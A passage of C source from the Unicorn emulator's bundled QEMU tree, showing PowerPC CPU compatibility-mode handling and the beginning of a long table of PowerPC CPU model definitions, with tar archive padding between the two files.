and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "sysemu/cpus.h" #include "cpu-models.h" #include "cpu.h" typedef struct { const char *name; uint32_t pvr; uint64_t pcr; uint64_t pcr_level; /* * Maximum allowed virtual threads per virtual core * * This is to stop older guests getting confused by seeing more * threads than they think the cpu can support. Usually it's * equal to the number of threads supported on bare metal * hardware, but not always (see POWER9). */ int max_vthreads; } CompatInfo; static const CompatInfo compat_table[] = { /* * Ordered from oldest to newest - the code relies on this */ { /* POWER6, ISA2.05 */ .name = "power6", .pvr = CPU_POWERPC_LOGICAL_2_05, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05 | PCR_TM_DIS | PCR_VSX_DIS, .pcr_level = PCR_COMPAT_2_05, .max_vthreads = 2, }, { /* POWER7, ISA2.06 */ .name = "power7", .pvr = CPU_POWERPC_LOGICAL_2_06, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_TM_DIS, .pcr_level = PCR_COMPAT_2_06, .max_vthreads = 4, }, { .name = "power7+", .pvr = CPU_POWERPC_LOGICAL_2_06_PLUS, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_TM_DIS, .pcr_level = PCR_COMPAT_2_06, .max_vthreads = 4, }, { /* POWER8, ISA2.07 */ .name = "power8", .pvr = CPU_POWERPC_LOGICAL_2_07, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07, .pcr_level = PCR_COMPAT_2_07, .max_vthreads = 8, }, { /* POWER9, ISA3.00 */ .name = "power9", .pvr = CPU_POWERPC_LOGICAL_3_00, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00, .pcr_level = PCR_COMPAT_3_00, /* * POWER9 hardware only supports 4 threads / core, but this * limit is for guests. We need to support 8 vthreads/vcore * on POWER9 for POWER8 compatibility guests, and it's very * confusing if half of the threads disappear from the guest * if it announces it's POWER9 aware at CAS time. */ .max_vthreads = 8, }, { /* POWER10, ISA3.10 */ .name = "power10", .pvr = CPU_POWERPC_LOGICAL_3_10, .pcr = PCR_COMPAT_3_10, .pcr_level = PCR_COMPAT_3_10, .max_vthreads = 8, }, }; static const CompatInfo *compat_by_pvr(uint32_t pvr) { int i; for (i = 0; i < ARRAY_SIZE(compat_table); i++) { if (compat_table[i].pvr == pvr) { return &compat_table[i]; } } return NULL; } static bool pcc_compat(PowerPCCPUClass *pcc, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr) { const CompatInfo *compat = compat_by_pvr(compat_pvr); const CompatInfo *min = compat_by_pvr(min_compat_pvr); const CompatInfo *max = compat_by_pvr(max_compat_pvr); g_assert(!min_compat_pvr || min); g_assert(!max_compat_pvr || max); if (!compat) { /* Not a recognized logical PVR */ return false; } if ((min && (compat < min)) || (max && (compat > max))) { /* Outside specified range */ return false; } if (!(pcc->pcr_supported & compat->pcr_level)) { /* Not supported by this CPU */ return false; } return true; } bool ppc_check_compat(PowerPCCPU *cpu, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); // g_assert(cpu->vhyp); return pcc_compat(pcc, compat_pvr, min_compat_pvr, max_compat_pvr); } #if 0 bool ppc_type_check_compat(const char *cputype, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(object_class_by_name(cputype)); return pcc_compat(pcc, compat_pvr, min_compat_pvr, max_compat_pvr); } void ppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr) { const CompatInfo *compat = compat_by_pvr(compat_pvr); CPUPPCState *env = &cpu->env; PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); uint64_t pcr; if (!compat_pvr) { pcr = 0; } else if (!compat) { error_setg(errp, "Unknown compatibility PVR 0x%08"PRIx32, compat_pvr); return; } else if (!ppc_check_compat(cpu, compat_pvr, 0, 0)) { error_setg(errp, "Compatibility PVR 0x%08"PRIx32" not valid for CPU", compat_pvr); return; } else { pcr = compat->pcr; } cpu_synchronize_state(CPU(cpu)); if (kvm_enabled() && cpu->compat_pvr != compat_pvr) { int ret = kvmppc_set_compat(cpu, compat_pvr); if (ret < 0) { error_setg_errno(errp, -ret, "Unable to set CPU compatibility mode in KVM"); return; } } cpu->compat_pvr = compat_pvr; env->spr[SPR_PCR] = pcr & pcc->pcr_mask; } typedef struct { uint32_t compat_pvr; } SetCompatState; static void do_set_compat(CPUState *cs, run_on_cpu_data arg) { PowerPCCPU *cpu = POWERPC_CPU(cs); SetCompatState *s = arg.host_ptr; ppc_set_compat(cpu, s->compat_pvr, &s->err); } void ppc_set_compat_all(uint32_t compat_pvr) { CPUState *cs; CPU_FOREACH(cs) { SetCompatState s = { .compat_pvr = compat_pvr, .err = NULL, }; run_on_cpu(cs, do_set_compat, RUN_ON_CPU_HOST_PTR(&s)); if (s.err) { #if 0 error_propagate(errp, s.err); #endif return; } } } int ppc_compat_max_vthreads(PowerPCCPU *cpu) { const CompatInfo *compat = compat_by_pvr(cpu->compat_pvr); int n_threads = CPU(cpu)->nr_threads; if (cpu->compat_pvr) { g_assert(compat); n_threads = MIN(n_threads, compat->max_vthreads); } return n_threads; } static void ppc_compat_prop_get(Object *obj, Visitor *v, const char *name, void *opaque, Error **errp) { uint32_t compat_pvr = *((uint32_t *)opaque); const char *value; if (!compat_pvr) { value = ""; } else { const CompatInfo *compat = compat_by_pvr(compat_pvr); g_assert(compat); value = compat->name; } visit_type_str(v, name, (char **)&value, errp); } static void ppc_compat_prop_set(Object *obj, Visitor *v, const char *name, void *opaque, Error **errp) { Error *local_err = NULL; char *value; uint32_t compat_pvr; visit_type_str(v, name, &value, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (strcmp(value, "") == 0) { compat_pvr = 0; } else { int i; const CompatInfo *compat = NULL; for (i = 0; i < ARRAY_SIZE(compat_table); i++) { if (strcmp(value, compat_table[i].name) == 0) { compat = &compat_table[i]; break; } } if (!compat) { error_setg(errp, "Invalid compatibility mode \"%s\"", value); goto out; } compat_pvr = compat->pvr; } *((uint32_t *)opaque) = compat_pvr; out: g_free(value); } void ppc_compat_add_property(Object *obj, const char *name, uint32_t *compat_pvr, const char *basedesc, Error **errp) { Error *local_err = NULL; gchar *namesv[ARRAY_SIZE(compat_table) + 1]; gchar *names, *desc; int i; object_property_add(obj, name, "string", ppc_compat_prop_get, ppc_compat_prop_set, NULL, compat_pvr, &local_err); if (local_err) { goto out; } for (i = 0; i < ARRAY_SIZE(compat_table); i++) { /* * Have to discard const here, because g_strjoinv() takes * (gchar **), not (const gchar **) :( */ namesv[i] = (gchar *)compat_table[i].name; } namesv[ARRAY_SIZE(compat_table)] = NULL; names = g_strjoinv(", ", namesv); desc = g_strdup_printf("%s. Valid values are %s.", basedesc, names); object_property_set_description(obj, name, desc, &local_err); g_free(names); g_free(desc); out: error_propagate(errp, local_err); } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/cpu-models.c����������������������������������������������������������0000664�0000000�0000000�00000136777�14675241067�0020464�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC CPU initialization for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright 2011 Freescale Semiconductor, Inc. * Copyright 2013 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "cpu-models.h" #if 0 /***************************************************************************/ /* PowerPC CPU definitions */ #define POWERPC_DEF_PREFIX(pvr, svr, type) \ glue(glue(glue(glue(pvr, _), svr), _), type) #define POWERPC_DEF_SVR(_name, _desc, _pvr, _svr, _type) \ static void \ glue(POWERPC_DEF_PREFIX(_pvr, _svr, _type), _cpu_class_init) \ (CPUClass *oc, void *data) \ { \ PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); \ \ pcc->pvr = _pvr; \ pcc->svr = _svr; \ } \ #define POWERPC_DEF(_name, _pvr, _type, _desc) \ POWERPC_DEF_SVR(_name, _desc, _pvr, POWERPC_SVR_NONE, _type) /* Embedded PowerPC */ /* PowerPC 401 family */ POWERPC_DEF("401", CPU_POWERPC_401, 401, "Generic PowerPC 401") /* PowerPC 401 cores */ POWERPC_DEF("401a1", CPU_POWERPC_401A1, 401, "PowerPC 401A1") POWERPC_DEF("401b2", CPU_POWERPC_401B2, 401x2, "PowerPC 401B2") POWERPC_DEF("401c2", CPU_POWERPC_401C2, 401x2, "PowerPC 401C2") POWERPC_DEF("401d2", CPU_POWERPC_401D2, 401x2, "PowerPC 401D2") POWERPC_DEF("401e2", CPU_POWERPC_401E2, 401x2, "PowerPC 401E2") POWERPC_DEF("401f2", CPU_POWERPC_401F2, 401x2, "PowerPC 401F2") /* XXX: to be checked */ POWERPC_DEF("401g2", CPU_POWERPC_401G2, 401x2, "PowerPC 401G2") /* PowerPC 401 microcontrollers */ POWERPC_DEF("iop480", CPU_POWERPC_IOP480, IOP480, "IOP480 (401 microcontroller)") POWERPC_DEF("cobra", CPU_POWERPC_COBRA, 401, "IBM Processor for Network Resources") /* PowerPC 403 family */ /* PowerPC 403 microcontrollers */ POWERPC_DEF("403ga", CPU_POWERPC_403GA, 403, "PowerPC 403 GA") POWERPC_DEF("403gb", CPU_POWERPC_403GB, 403, "PowerPC 403 GB") POWERPC_DEF("403gc", CPU_POWERPC_403GC, 403, "PowerPC 403 GC") POWERPC_DEF("403gcx", CPU_POWERPC_403GCX, 403GCX, "PowerPC 403 GCX") /* PowerPC 405 family */ /* PowerPC 405 cores */ POWERPC_DEF("405d2", CPU_POWERPC_405D2, 405, "PowerPC 405 D2") POWERPC_DEF("405d4", CPU_POWERPC_405D4, 405, "PowerPC 405 D4") /* PowerPC 405 microcontrollers */ POWERPC_DEF("405cra", CPU_POWERPC_405CRa, 405, "PowerPC 405 CRa") POWERPC_DEF("405crb", CPU_POWERPC_405CRb, 405, "PowerPC 405 CRb") POWERPC_DEF("405crc", CPU_POWERPC_405CRc, 405, "PowerPC 405 CRc") POWERPC_DEF("405ep", CPU_POWERPC_405EP, 405, "PowerPC 405 EP") POWERPC_DEF("405ez", CPU_POWERPC_405EZ, 405, "PowerPC 405 EZ") POWERPC_DEF("405gpa", CPU_POWERPC_405GPa, 405, "PowerPC 405 GPa") POWERPC_DEF("405gpb", CPU_POWERPC_405GPb, 405, "PowerPC 405 GPb") POWERPC_DEF("405gpc", CPU_POWERPC_405GPc, 405, "PowerPC 405 GPc") POWERPC_DEF("405gpd", CPU_POWERPC_405GPd, 405, "PowerPC 405 GPd") POWERPC_DEF("405gpr", CPU_POWERPC_405GPR, 405, "PowerPC 405 GPR") POWERPC_DEF("405lp", CPU_POWERPC_405LP, 405, "PowerPC 405 LP") POWERPC_DEF("npe405h", CPU_POWERPC_NPE405H, 405, "Npe405 H") POWERPC_DEF("npe405h2", CPU_POWERPC_NPE405H2, 405, "Npe405 H2") POWERPC_DEF("npe405l", CPU_POWERPC_NPE405L, 405, "Npe405 L") POWERPC_DEF("npe4gs3", CPU_POWERPC_NPE4GS3, 405, "Npe4GS3") /* PowerPC 401/403/405 based set-top-box microcontrollers */ POWERPC_DEF("stb03", CPU_POWERPC_STB03, 405, "STB03xx") POWERPC_DEF("stb04", CPU_POWERPC_STB04, 405, "STB04xx") POWERPC_DEF("stb25", CPU_POWERPC_STB25, 405, "STB25xx") /* Xilinx PowerPC 405 cores */ POWERPC_DEF("x2vp4", CPU_POWERPC_X2VP4, 405, NULL) POWERPC_DEF("x2vp20", CPU_POWERPC_X2VP20, 405, NULL) /* PowerPC 440 family */ #if defined(TODO_USER_ONLY) POWERPC_DEF("440", CPU_POWERPC_440, 440GP, "Generic PowerPC 440") #endif /* PowerPC 440 cores */ POWERPC_DEF("440-xilinx", CPU_POWERPC_440_XILINX, 440x5, "PowerPC 440 Xilinx 5") POWERPC_DEF("440-xilinx-w-dfpu", CPU_POWERPC_440_XILINX, 440x5wDFPU, "PowerPC 440 Xilinx 5 With a Double Prec. FPU") /* PowerPC 440 microcontrollers */ POWERPC_DEF("440epa", CPU_POWERPC_440EPa, 440EP, "PowerPC 440 EPa") POWERPC_DEF("440epb", CPU_POWERPC_440EPb, 440EP, "PowerPC 440 EPb") POWERPC_DEF("440epx", CPU_POWERPC_440EPX, 440EP, "PowerPC 440 EPX") POWERPC_DEF("460exb", CPU_POWERPC_460EXb, 460EX, "PowerPC 460 EXb") #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpb", CPU_POWERPC_440GPb, 440GP, "PowerPC 440 GPb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpc", CPU_POWERPC_440GPc, 440GP, "PowerPC 440 GPc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gra", CPU_POWERPC_440GRa, 440x5, "PowerPC 440 GRa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440grx", CPU_POWERPC_440GRX, 440x5, "PowerPC 440 GRX") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxa", CPU_POWERPC_440GXa, 440EP, "PowerPC 440 GXa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxb", CPU_POWERPC_440GXb, 440EP, "PowerPC 440 GXb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxc", CPU_POWERPC_440GXc, 440EP, "PowerPC 440 GXc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxf", CPU_POWERPC_440GXf, 440EP, "PowerPC 440 GXf") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp", CPU_POWERPC_440SP, 440EP, "PowerPC 440 SP") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp2", CPU_POWERPC_440SP2, 440EP, "PowerPC 440 SP2") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440spe", CPU_POWERPC_440SPE, 440EP, "PowerPC 440 SPE") #endif /* Freescale embedded PowerPC cores */ /* MPC5xx family (aka RCPU) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc5xx", CPU_POWERPC_MPC5xx, MPC5xx, "Generic MPC5xx core") #endif /* MPC8xx family (aka PowerQUICC) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc8xx", CPU_POWERPC_MPC8xx, MPC8xx, "Generic MPC8xx core") #endif /* MPC82xx family (aka PowerQUICC-II) */ POWERPC_DEF("g2", CPU_POWERPC_G2, G2, "PowerPC G2 core") POWERPC_DEF("g2h4", CPU_POWERPC_G2H4, G2, "PowerPC G2 H4 core") POWERPC_DEF("g2gp", CPU_POWERPC_G2gp, G2, "PowerPC G2 GP core") POWERPC_DEF("g2ls", CPU_POWERPC_G2ls, G2, "PowerPC G2 LS core") POWERPC_DEF("g2hip3", CPU_POWERPC_G2_HIP3, G2, "PowerPC G2 HiP3 core") POWERPC_DEF("g2hip4", CPU_POWERPC_G2_HIP4, G2, "PowerPC G2 HiP4 core") POWERPC_DEF("mpc603", CPU_POWERPC_MPC603, 603E, "PowerPC MPC603 core") POWERPC_DEF("g2le", CPU_POWERPC_G2LE, G2LE, "PowerPC G2le core (same as G2 plus little-endian mode support)") POWERPC_DEF("g2legp", CPU_POWERPC_G2LEgp, G2LE, "PowerPC G2LE GP core") POWERPC_DEF("g2lels", CPU_POWERPC_G2LEls, G2LE, "PowerPC G2LE LS core") POWERPC_DEF("g2legp1", CPU_POWERPC_G2LEgp1, G2LE, "PowerPC G2LE GP1 core") POWERPC_DEF("g2legp3", CPU_POWERPC_G2LEgp3, G2LE, "PowerPC G2LE GP3 core") /* PowerPC G2 microcontrollers */ POWERPC_DEF_SVR("mpc5200_v10", "MPC5200 v1.0", CPU_POWERPC_MPC5200_v10, POWERPC_SVR_5200_v10, G2LE) POWERPC_DEF_SVR("mpc5200_v11", "MPC5200 v1.1", CPU_POWERPC_MPC5200_v11, POWERPC_SVR_5200_v11, G2LE) POWERPC_DEF_SVR("mpc5200_v12", "MPC5200 v1.2", CPU_POWERPC_MPC5200_v12, POWERPC_SVR_5200_v12, G2LE) POWERPC_DEF_SVR("mpc5200b_v20", "MPC5200B v2.0", CPU_POWERPC_MPC5200B_v20, POWERPC_SVR_5200B_v20, G2LE) POWERPC_DEF_SVR("mpc5200b_v21", "MPC5200B v2.1", CPU_POWERPC_MPC5200B_v21, POWERPC_SVR_5200B_v21, G2LE) /* e200 family */ POWERPC_DEF("e200z5", CPU_POWERPC_e200z5, e200, "PowerPC e200z5 core") POWERPC_DEF("e200z6", CPU_POWERPC_e200z6, e200, "PowerPC e200z6 core") /* e300 family */ POWERPC_DEF("e300c1", CPU_POWERPC_e300c1, e300, "PowerPC e300c1 core") POWERPC_DEF("e300c2", CPU_POWERPC_e300c2, e300, "PowerPC e300c2 core") POWERPC_DEF("e300c3", CPU_POWERPC_e300c3, e300, "PowerPC e300c3 core") POWERPC_DEF("e300c4", CPU_POWERPC_e300c4, e300, "PowerPC e300c4 core") /* PowerPC e300 microcontrollers */ POWERPC_DEF_SVR("mpc8343", "MPC8343", CPU_POWERPC_MPC834x, POWERPC_SVR_8343, e300) POWERPC_DEF_SVR("mpc8343a", "MPC8343A", CPU_POWERPC_MPC834x, POWERPC_SVR_8343A, e300) POWERPC_DEF_SVR("mpc8343e", "MPC8343E", CPU_POWERPC_MPC834x, POWERPC_SVR_8343E, e300) POWERPC_DEF_SVR("mpc8343ea", "MPC8343EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8343EA, e300) POWERPC_DEF_SVR("mpc8347t", "MPC8347T", CPU_POWERPC_MPC834x, POWERPC_SVR_8347T, e300) POWERPC_DEF_SVR("mpc8347p", "MPC8347P", CPU_POWERPC_MPC834x, POWERPC_SVR_8347P, e300) POWERPC_DEF_SVR("mpc8347at", "MPC8347AT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AT, e300) POWERPC_DEF_SVR("mpc8347ap", "MPC8347AP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AP, e300) POWERPC_DEF_SVR("mpc8347et", "MPC8347ET", CPU_POWERPC_MPC834x, POWERPC_SVR_8347ET, e300) POWERPC_DEF_SVR("mpc8347ep", "MPC8343EP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EP, e300) POWERPC_DEF_SVR("mpc8347eat", "MPC8347EAT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAT, e300) POWERPC_DEF_SVR("mpc8347eap", "MPC8343EAP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAP, e300) POWERPC_DEF_SVR("mpc8349", "MPC8349", CPU_POWERPC_MPC834x, POWERPC_SVR_8349, e300) POWERPC_DEF_SVR("mpc8349a", "MPC8349A", CPU_POWERPC_MPC834x, POWERPC_SVR_8349A, e300) POWERPC_DEF_SVR("mpc8349e", "MPC8349E", CPU_POWERPC_MPC834x, POWERPC_SVR_8349E, e300) POWERPC_DEF_SVR("mpc8349ea", "MPC8349EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8349EA, e300) POWERPC_DEF_SVR("mpc8377", "MPC8377", CPU_POWERPC_MPC837x, POWERPC_SVR_8377, e300) POWERPC_DEF_SVR("mpc8377e", "MPC8377E", CPU_POWERPC_MPC837x, POWERPC_SVR_8377E, e300) POWERPC_DEF_SVR("mpc8378", "MPC8378", CPU_POWERPC_MPC837x, POWERPC_SVR_8378, e300) POWERPC_DEF_SVR("mpc8378e", "MPC8378E", CPU_POWERPC_MPC837x, POWERPC_SVR_8378E, e300) POWERPC_DEF_SVR("mpc8379", "MPC8379", CPU_POWERPC_MPC837x, POWERPC_SVR_8379, e300) POWERPC_DEF_SVR("mpc8379e", "MPC8379E", CPU_POWERPC_MPC837x, POWERPC_SVR_8379E, e300) /* e500 family */ POWERPC_DEF_SVR("e500_v10", "PowerPC e500 v1.0 core", CPU_POWERPC_e500v1_v10, POWERPC_SVR_E500, e500v1); POWERPC_DEF_SVR("e500_v20", "PowerPC e500 v2.0 core", CPU_POWERPC_e500v1_v20, POWERPC_SVR_E500, e500v1); POWERPC_DEF_SVR("e500v2_v10", "PowerPC e500v2 v1.0 core", CPU_POWERPC_e500v2_v10, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v20", "PowerPC e500v2 v2.0 core", CPU_POWERPC_e500v2_v20, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v21", "PowerPC e500v2 v2.1 core", CPU_POWERPC_e500v2_v21, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v22", "PowerPC e500v2 v2.2 core", CPU_POWERPC_e500v2_v22, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v30", "PowerPC e500v2 v3.0 core", CPU_POWERPC_e500v2_v30, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500mc", "e500mc", CPU_POWERPC_e500mc, POWERPC_SVR_E500, e500mc) #ifdef TARGET_PPC64 POWERPC_DEF_SVR("e5500", "e5500", CPU_POWERPC_e5500, POWERPC_SVR_E500, e5500) POWERPC_DEF_SVR("e6500", "e6500", CPU_POWERPC_e6500, POWERPC_SVR_E500, e6500) #endif /* PowerPC e500 microcontrollers */ POWERPC_DEF_SVR("mpc8533_v10", "MPC8533 v1.0", CPU_POWERPC_MPC8533_v10, POWERPC_SVR_8533_v10, e500v2) POWERPC_DEF_SVR("mpc8533_v11", "MPC8533 v1.1", CPU_POWERPC_MPC8533_v11, POWERPC_SVR_8533_v11, e500v2) POWERPC_DEF_SVR("mpc8533e_v10", "MPC8533E v1.0", CPU_POWERPC_MPC8533E_v10, POWERPC_SVR_8533E_v10, e500v2) POWERPC_DEF_SVR("mpc8533e_v11", "MPC8533E v1.1", CPU_POWERPC_MPC8533E_v11, POWERPC_SVR_8533E_v11, e500v2) POWERPC_DEF_SVR("mpc8540_v10", "MPC8540 v1.0", CPU_POWERPC_MPC8540_v10, POWERPC_SVR_8540_v10, e500v1) POWERPC_DEF_SVR("mpc8540_v20", "MPC8540 v2.0", CPU_POWERPC_MPC8540_v20, POWERPC_SVR_8540_v20, e500v1) POWERPC_DEF_SVR("mpc8540_v21", "MPC8540 v2.1", CPU_POWERPC_MPC8540_v21, POWERPC_SVR_8540_v21, e500v1) POWERPC_DEF_SVR("mpc8541_v10", "MPC8541 v1.0", CPU_POWERPC_MPC8541_v10, POWERPC_SVR_8541_v10, e500v1) POWERPC_DEF_SVR("mpc8541_v11", "MPC8541 v1.1", CPU_POWERPC_MPC8541_v11, POWERPC_SVR_8541_v11, e500v1) POWERPC_DEF_SVR("mpc8541e_v10", "MPC8541E v1.0", CPU_POWERPC_MPC8541E_v10, POWERPC_SVR_8541E_v10, e500v1) POWERPC_DEF_SVR("mpc8541e_v11", "MPC8541E v1.1", CPU_POWERPC_MPC8541E_v11, POWERPC_SVR_8541E_v11, e500v1) POWERPC_DEF_SVR("mpc8543_v10", "MPC8543 v1.0", CPU_POWERPC_MPC8543_v10, POWERPC_SVR_8543_v10, e500v2) POWERPC_DEF_SVR("mpc8543_v11", "MPC8543 v1.1", CPU_POWERPC_MPC8543_v11, POWERPC_SVR_8543_v11, e500v2) POWERPC_DEF_SVR("mpc8543_v20", "MPC8543 v2.0", CPU_POWERPC_MPC8543_v20, POWERPC_SVR_8543_v20, e500v2) POWERPC_DEF_SVR("mpc8543_v21", "MPC8543 v2.1", CPU_POWERPC_MPC8543_v21, POWERPC_SVR_8543_v21, e500v2) POWERPC_DEF_SVR("mpc8543e_v10", "MPC8543E v1.0", CPU_POWERPC_MPC8543E_v10, POWERPC_SVR_8543E_v10, e500v2) POWERPC_DEF_SVR("mpc8543e_v11", "MPC8543E v1.1", CPU_POWERPC_MPC8543E_v11, POWERPC_SVR_8543E_v11, e500v2) POWERPC_DEF_SVR("mpc8543e_v20", "MPC8543E v2.0", CPU_POWERPC_MPC8543E_v20, POWERPC_SVR_8543E_v20, e500v2) POWERPC_DEF_SVR("mpc8543e_v21", "MPC8543E v2.1", CPU_POWERPC_MPC8543E_v21, POWERPC_SVR_8543E_v21, e500v2) POWERPC_DEF_SVR("mpc8544_v10", "MPC8544 v1.0", CPU_POWERPC_MPC8544_v10, POWERPC_SVR_8544_v10, e500v2) POWERPC_DEF_SVR("mpc8544_v11", "MPC8544 v1.1", CPU_POWERPC_MPC8544_v11, POWERPC_SVR_8544_v11, e500v2) POWERPC_DEF_SVR("mpc8544e_v10", "MPC8544E v1.0", CPU_POWERPC_MPC8544E_v10, POWERPC_SVR_8544E_v10, e500v2) POWERPC_DEF_SVR("mpc8544e_v11", "MPC8544E v1.1", CPU_POWERPC_MPC8544E_v11, POWERPC_SVR_8544E_v11, e500v2) POWERPC_DEF_SVR("mpc8545_v20", "MPC8545 v2.0", CPU_POWERPC_MPC8545_v20, POWERPC_SVR_8545_v20, e500v2) POWERPC_DEF_SVR("mpc8545_v21", "MPC8545 v2.1", CPU_POWERPC_MPC8545_v21, POWERPC_SVR_8545_v21, e500v2) POWERPC_DEF_SVR("mpc8545e_v20", "MPC8545E v2.0", CPU_POWERPC_MPC8545E_v20, POWERPC_SVR_8545E_v20, e500v2) POWERPC_DEF_SVR("mpc8545e_v21", "MPC8545E v2.1", CPU_POWERPC_MPC8545E_v21, POWERPC_SVR_8545E_v21, e500v2) POWERPC_DEF_SVR("mpc8547e_v20", "MPC8547E v2.0", CPU_POWERPC_MPC8547E_v20, POWERPC_SVR_8547E_v20, e500v2) POWERPC_DEF_SVR("mpc8547e_v21", "MPC8547E v2.1", CPU_POWERPC_MPC8547E_v21, POWERPC_SVR_8547E_v21, e500v2) POWERPC_DEF_SVR("mpc8548_v10", "MPC8548 v1.0", CPU_POWERPC_MPC8548_v10, POWERPC_SVR_8548_v10, e500v2) POWERPC_DEF_SVR("mpc8548_v11", "MPC8548 v1.1", CPU_POWERPC_MPC8548_v11, POWERPC_SVR_8548_v11, e500v2) POWERPC_DEF_SVR("mpc8548_v20", "MPC8548 v2.0", CPU_POWERPC_MPC8548_v20, POWERPC_SVR_8548_v20, e500v2) POWERPC_DEF_SVR("mpc8548_v21", "MPC8548 v2.1", CPU_POWERPC_MPC8548_v21, POWERPC_SVR_8548_v21, e500v2) POWERPC_DEF_SVR("mpc8548e_v10", "MPC8548E v1.0", CPU_POWERPC_MPC8548E_v10, POWERPC_SVR_8548E_v10, e500v2) POWERPC_DEF_SVR("mpc8548e_v11", "MPC8548E v1.1", CPU_POWERPC_MPC8548E_v11, POWERPC_SVR_8548E_v11, e500v2) POWERPC_DEF_SVR("mpc8548e_v20", "MPC8548E v2.0", CPU_POWERPC_MPC8548E_v20, POWERPC_SVR_8548E_v20, e500v2) POWERPC_DEF_SVR("mpc8548e_v21", "MPC8548E v2.1", CPU_POWERPC_MPC8548E_v21, POWERPC_SVR_8548E_v21, e500v2) POWERPC_DEF_SVR("mpc8555_v10", "MPC8555 v1.0", CPU_POWERPC_MPC8555_v10, POWERPC_SVR_8555_v10, e500v2) POWERPC_DEF_SVR("mpc8555_v11", "MPC8555 v1.1", CPU_POWERPC_MPC8555_v11, POWERPC_SVR_8555_v11, e500v2) POWERPC_DEF_SVR("mpc8555e_v10", "MPC8555E v1.0", CPU_POWERPC_MPC8555E_v10, POWERPC_SVR_8555E_v10, e500v2) POWERPC_DEF_SVR("mpc8555e_v11", "MPC8555E v1.1", CPU_POWERPC_MPC8555E_v11, POWERPC_SVR_8555E_v11, e500v2) POWERPC_DEF_SVR("mpc8560_v10", "MPC8560 v1.0", CPU_POWERPC_MPC8560_v10, POWERPC_SVR_8560_v10, e500v2) POWERPC_DEF_SVR("mpc8560_v20", "MPC8560 v2.0", CPU_POWERPC_MPC8560_v20, POWERPC_SVR_8560_v20, e500v2) POWERPC_DEF_SVR("mpc8560_v21", "MPC8560 v2.1", CPU_POWERPC_MPC8560_v21, POWERPC_SVR_8560_v21, e500v2) POWERPC_DEF_SVR("mpc8567", "MPC8567", CPU_POWERPC_MPC8567, POWERPC_SVR_8567, e500v2) POWERPC_DEF_SVR("mpc8567e", "MPC8567E", CPU_POWERPC_MPC8567E, POWERPC_SVR_8567E, e500v2) POWERPC_DEF_SVR("mpc8568", "MPC8568", CPU_POWERPC_MPC8568, POWERPC_SVR_8568, e500v2) POWERPC_DEF_SVR("mpc8568e", "MPC8568E", CPU_POWERPC_MPC8568E, POWERPC_SVR_8568E, e500v2) POWERPC_DEF_SVR("mpc8572", "MPC8572", CPU_POWERPC_MPC8572, POWERPC_SVR_8572, e500v2) POWERPC_DEF_SVR("mpc8572e", 